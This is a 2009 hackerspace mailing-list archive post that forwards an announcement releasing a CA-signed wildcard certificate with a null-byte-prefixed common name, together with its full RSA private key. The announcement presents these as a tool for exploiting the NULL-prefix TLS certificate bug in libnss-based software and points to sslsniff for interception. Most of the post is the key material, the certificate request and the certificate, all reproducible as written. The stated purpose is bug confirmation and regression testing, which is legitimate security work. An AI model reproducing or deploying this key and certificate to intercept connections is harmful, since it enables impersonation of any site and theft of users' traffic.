[Vanhackspace] Fwd: [Noisebridge-discuss] Merry Certmas! CN=*\x00thoughtcrime.noisebridge.net
Derek Anderson
derek at chargedmultimedia.com
Thu Oct 1 19:03:19 PDT 2009
Heh. This post induced much drunken mirth.
* cert == win.
On 9/30/09, Joe Bowser <bowserj at gmail.com> wrote:
> w00t
>
> ---------- Forwarded message ----------
> From: Jacob Appelbaum <jacob at appelbaum.net>
> Date: Tue, Sep 29, 2009 at 10:51 PM
> Subject: [Noisebridge-discuss] Merry Certmas! CN=*\
> x00thoughtcrime.noisebridge.net
> To: "noisebridge-discuss at lists.noisebridge.net" <
> noisebridge-discuss at lists.noisebridge.net>,
> noisebridge-announce at lists.noisebridge.net, Cryptography <
> cryptography at metzdowd.com>
>
>
> Hello *,
>
> In the spirit of giving and sharing, I felt it would be nice to enable
> other Noisebridgers (and friends of Noisebridge) to play around with
> bugs in SSL/TLS.
>
> Moxie was just over and we'd discussed releasing this certificate for
> some time. He's already released a few certificates and I thought I'd
> join him. In celebration of his visit to San Francisco, I wanted to
> release fun-times-at-moxie-marlinspike-high. This is a text file that
> contains a fully valid, signed certificate (with private key) that can
> be used to exploit the NULL certificate prefix bug[0]. The certificate
> is valid for * on the internet (when exploiting libnss software). The
> certificate is good for two years. It won't work for exploiting the bug
> for software written with the WIN32 api, they don't accept (for good
> reason) *! I suggest the use of Moxie's sslsniff[1] if you're so
> inclined to try network related testing. It may also be useful for
> testing code signing software.
>
> It's been long enough that everyone should be patched for this awesome
> class of bugs. This certificate and corresponding private key should
> help people test fairly obscure software or software they've written
> themselves. I hope this release will help with confirmation of the bug
> and with regression testing. Feel free to use this certificate for
> anything relating to free software too. Consider it released into the
> public domain of interesting integers.
>
> Enjoy!
>
> Best,
> Jacob
>
> [0] http://thoughtcrime.org/papers/null-prefix-attacks.pdf
> [1] http://thoughtcrime.org/software/sslsniff/
>
> Private-Key: (1024 bit)
> modulus:
> 00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
> 5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
> c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
> 6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
> 72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
> 29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
> bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
> 93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
> ce:f0:82:33:d8:76:06:4c:9f
> publicExponent: 65537 (0x10001)
> privateExponent:
> 00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
> 3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
> 6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
> 51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
> c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
> 06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
> 35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
> 28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
> 57:2c:78:a9:42:b2:49:d8:71
> prime1:
> 00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
> 0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
> 2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
> 96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
> e6:3a:40:99:03
> prime2:
> 00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
> 17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
> e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
> c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
> 49:79:53:35:35
> exponent1:
> 15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
> 66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
> 8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
> 88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
> 77:eb:0d:c1
> exponent2:
> 5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
> be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
> 78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
> 85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
> 2d:92:6e:ed
> coefficient:
> 00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
> 8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
> a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
> 12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
> e6:c2:29:86:17
> Certificate Request:
> Data:
> Version: 0 (0x0)
> Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California,
> L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
> Subject Public Key Info:
> Public Key Algorithm: rsaEncryption
> RSA Public Key: (1024 bit)
> Modulus (1024 bit):
> 00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
> 5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
> c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
> 6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
> 72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
> 29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
> bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
> 93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
> ce:f0:82:33:d8:76:06:4c:9f
> Exponent: 65537 (0x10001)
> Attributes:
> a0:00
> Signature Algorithm: md5WithRSAEncryption
> 64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
> c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
> a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
> 0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
> d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
> 70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
> f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
> a2:dc
> -----BEGIN RSA PRIVATE KEY-----
> MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
> B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
> E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
> AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
> UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
> gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
> mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
> 5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
> HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
> 19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
> OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
> IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
> g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
> -----END RSA PRIVATE KEY-----
> -----BEGIN CERTIFICATE REQUEST-----
> MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
> aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
> BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
> Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
> ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
> HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
> n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
> DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
> ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
> 4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
> otw=
> -----END CERTIFICATE REQUEST-----
> -----BEGIN CERTIFICATE-----
> MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
> RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
> VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
> Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
> aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
> aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
> DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
> MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
> BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
> VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
> Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
> iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
> 82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
> Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
> Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
> A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
> TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
> A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
> bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
> ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
> LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
> MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
> L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
> dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
> CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
> bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
> cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
> ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
> MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
> Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
> BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
> gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
> Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
> p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
> -----END CERTIFICATE-----
>
>
> _______________________________________________
> Noisebridge-discuss mailing list
> Noisebridge-discuss at lists.noisebridge.net
> https://www.noisebridge.net/mailman/listinfo/noisebridge-discuss
>
--
Sent from my mobile device
More information about the Vanhackspace
mailing list